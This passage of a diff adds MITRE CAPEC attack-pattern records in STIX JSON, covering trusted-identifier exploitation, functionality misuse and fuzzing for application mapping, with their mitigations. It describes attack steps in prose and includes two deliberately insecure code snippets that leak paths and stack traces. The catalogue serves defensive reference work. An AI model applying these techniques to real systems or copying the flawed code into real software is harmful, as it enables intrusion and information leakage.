"ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

    2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

    2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", + "id": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f9eaa515-4e04-4e48-a95a-a5cc76d3fae0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.", + "id": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65db9cb6-fc43-4034-b579-eb165dd5e4cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", + "id": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e264f74e-3bd0-46ab-bd67-3526a6e9d54f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.", + "id": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12007caf-e1d7-492f-a685-f88c073bccb6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use strong session identifiers that are protected in transit and at rest.", + "id": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a4a61eb-f51c-417d-88d8-2417fea9f0a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c05cd2c-a62f-42aa-b4f2-db68b48a7d78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Verify authenticity of all identifiers at runtime.", + "id": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a9103ab-a9ea-40f7-9a9c-2789bebcf094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-211", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/211.html" + } + ], + "id": "attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", + "external_references": [ + { + "external_id": "CAPEC-212", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + }, + { + "external_id": "CWE-1246", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1246.html" + }, + { + "external_id": "CWE-1281", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1281.html" + } + ], + "id": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Misuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack of this kind can compromise the confidentiality of an authorized user's credentials.)", + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Integrity": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37" + ], + "x_capec_prerequisites": [ + "The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes." + ], + "x_capec_skills_required": { + "Low": "General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", + "id": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--264be4df-68bd-477a-8b05-e975efd6ada7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and compromised.", + "id": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3688d3c6-8574-4547-aa9d-2d75e6da59b3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "spec_version": "2.1", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-213", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/213.html" + } + ], + "id": "attack-pattern--3ec96bbd-da0c-4640-a8ae-50e506206a2b", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Directory Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was merged into \"CAPEC-215 : Fuzzing for application mapping\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-214", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/214.html" + } + ], + "id": "attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DEPRECATED: Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.", + "external_references": [ + { + "external_id": "CAPEC-215", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/215.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-532", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/532.html" + } + ], + "id": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Fuzzing for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--7f0ec88f-b057-4a73-93d8-8a30cfdbcf77" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n ", + "\n In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.\n public void httpGet(HttpServletRequest request, HttpServletResponse response) {try {processRequest();} catch (Exception ex) {ex.printStackTrace(response.getWriter());\n return;}}\n If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

    2. Techniques
    Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
    Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
    Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

  1. Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.

    2. Techniques
    Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
    Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.

  2. Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application

Exploit

  1. Craft exploit payloads: An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.

    2. Techniques
    Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
    If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials.
", + "x_capec_extended_description": "\n By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing." + ], + "x_capec_resources_required": [ + "Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target." + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e83220a2-4674-498f-8f1f-684464a2de79", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6313ef4d-92ce-4fa2-89d3-e46c3645bc94", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98fe200c-e422-46ab-a1e3-1ece266fe87a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3b7fd0f-034a-4c49-b011-83527159115d", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2827e6fe-cb69-4bb9-a62c-a073e37c5f85", + "modified": 